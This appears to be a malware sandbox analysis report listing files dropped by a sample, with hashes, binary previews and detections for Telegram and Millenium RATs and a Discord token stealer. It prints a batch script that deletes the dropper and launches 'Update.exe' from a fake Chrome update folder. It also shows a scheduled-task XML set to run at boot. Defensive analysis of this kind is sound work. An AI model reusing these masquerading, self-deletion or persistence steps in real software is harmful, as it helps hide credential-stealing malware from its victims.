SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PWS.Stealer.38408.30550.27254.exe, Detection: malicious, Browse Filename: tts.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Python.Muldrop.25.8678.4056.exe, Detection: malicious, Browse Filename: gG5vKnBFax.exe, Detection: malicious, Browse Filename: 47YnqNpB7R.exe, Detection: malicious, Browse Filename: OPPVXcEaPW.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W64.S-8cfa6ebc.Eldorado.16653.18215.exe, Detection: malicious, Browse Filename: tOCTdBymcy.exe, Detection: malicious, Browse Filename: PpQMwNh.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83736
Entropy (8bit):	6.595094797707322
Encrypted:	false
SSDEEP:	1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:	86D1B2A9070CD7D52124126A357FF067
SHA1:	18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:	62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:	7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	254744
Entropy (8bit):	6.564308911485739
Encrypted:	false
SSDEEP:	6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
MD5:	20C77203DDF9FF2FF96D6D11DEA2EDCF
SHA1:	0D660B8D1161E72C993C6E2AB0292A409F6379A5
SHA-256:	9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
SHA-512:	2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....\|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......\|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...\|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64792
Entropy (8bit):	6.223467179037751
Encrypted:	false
SSDEEP:	1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
MD5:	D4674750C732F0DB4C4DD6A83A9124FE
SHA1:	FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
SHA-256:	CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
SHA-512:	97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158488
Entropy (8bit):	6.8491143497239655
Encrypted:	false
SSDEEP:	3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
MD5:	7447EFD8D71E8A1929BE0FAC722B42DC
SHA1:	6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
SHA-256:	60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
SHA-512:	C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79128
Entropy (8bit):	6.284790077237953
Encrypted:	false
SSDEEP:	1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:	819166054FEC07EFCD1062F13C2147EE
SHA1:	93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:	E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:	DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\base_library.zip

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682993312079324
Encrypted:	false
SSDEEP:	12288:cgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMN+:cgYJiVBFLa2VIVwx/fpEWe+MN+
MD5:	C4989BCEB9E7E83078812C9532BAEEA7
SHA1:	AAFB66EBDB5EDC327D7CB6632EB80742BE1AD2EB
SHA-256:	A0F5C7F0BAC1EA9DC86D60D20F903CC42CFF3F21737426D69D47909FC28B6DCD
SHA-512:	FB6D431D0F2C8543AF8DF242337797F981D108755712EC6C134D451AA777D377DF085B4046970CC5AC0991922DDF1F37445A51BE1A63EF46B0D80841222FB671
Malicious:	false
Preview:	PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dll

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4458776
Entropy (8bit):	6.460390021076921
Encrypted:	false
SSDEEP:	49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:	63A1FA9259A35EAEAC04174CECB90048
SHA1:	0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:	14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7619102
Entropy (8bit):	7.992191224394449
Encrypted:	true
SSDEEP:	196608:96zi+UrgcJ2UTbNI4S+idsx5rqG1fm3josxH5l9cgFacVm6:96zi+UrJcWJN+jtxH5vFaiP
MD5:	232B5DBB1510598F8A683DD2752A99C4
SHA1:	049482CA00718F56B610C3430F2048FEB2823A01
SHA-256:	77FC8CE7D3439EDFB9677D665E48D9EFAB28629C271FF678387661BDBEAE1F82
SHA-512:	9492D3BED063CCDF77398B32C8D77F3B85003E6C3B76A3878492727C157026EC77A1A1349E1C7C901F15FE19F822DA314C602C9D49460AD0F9C1B43596851A71
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\select.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pjij2y0.djm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5ha2eiq.udd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt2e54jp.kuj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc4shyme.u24.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat

Download File

Process:	C:\ProgramData\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	272
Entropy (8bit):	5.0624557588259576
Encrypted:	false
SSDEEP:	6:QkENFsPnIBdGKoQRw+HGn5QCvmUwknaZ5MHPKw+Hs8E1wknaZ5MH6tuovn:QVF9OKjmn57+XrHMvk1EmrHMO
MD5:	B5CD3B0A9131CDC2F88B2458A85AF7A7
SHA1:	7F0E809D5101870FF0B8A8F9FF8AAEB3CFE2373C
SHA-256:	289742DA6DBFED6FA49190763CF545F5642841016C478BEB9CBEA090B49946C4
SHA-512:	30D58D364975A5F16EC5AA273A1B0DD76167B0F95D8A165B2CD96AE27398FED9D84695FB25C144D67690132AF0C5EB1B132BE80289A54BA1B8A1BFCA0B6CFDD0
Malicious:	false
Preview:	:l..Tasklist /fi "PID eq 7748" \| find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Del "main.exe"..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..

C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

Download File

Process:	C:\ProgramData\setup.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Download File

Process:	C:\ProgramData\main.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5872343
Entropy (8bit):	7.487098045911562
Encrypted:	false
SSDEEP:	98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciA
MD5:	DE8515E07D1C34FFF3C1DDD4FEE593FB
SHA1:	A27A35EC375BADC2B4C6AA73208DEF10B51DAC2D
SHA-256:	0DC68AE03B47614770A09DAFD37DA88B86358D09C6DF9D54AEC2A665F4972406
SHA-512:	3C2065D4F8D2DFF3819BBB34D1E77F6CE68884434258D2FD9893EAAAADA302B309E8E4E94EA0F9798145E6E3AAB850A2234AA1216896934BC03679F8A35C2A0F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(......(......{...."..}......F.{....o....s.......2...{....o..../..{.....o.....s,......(....,.(........2...{....o....2..{.....o.....{......o......s,...v..(....,.(.......{.....o....2.{....o.......2...{....o....2...{.....o.....{.....o....>.{.....o....&...0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
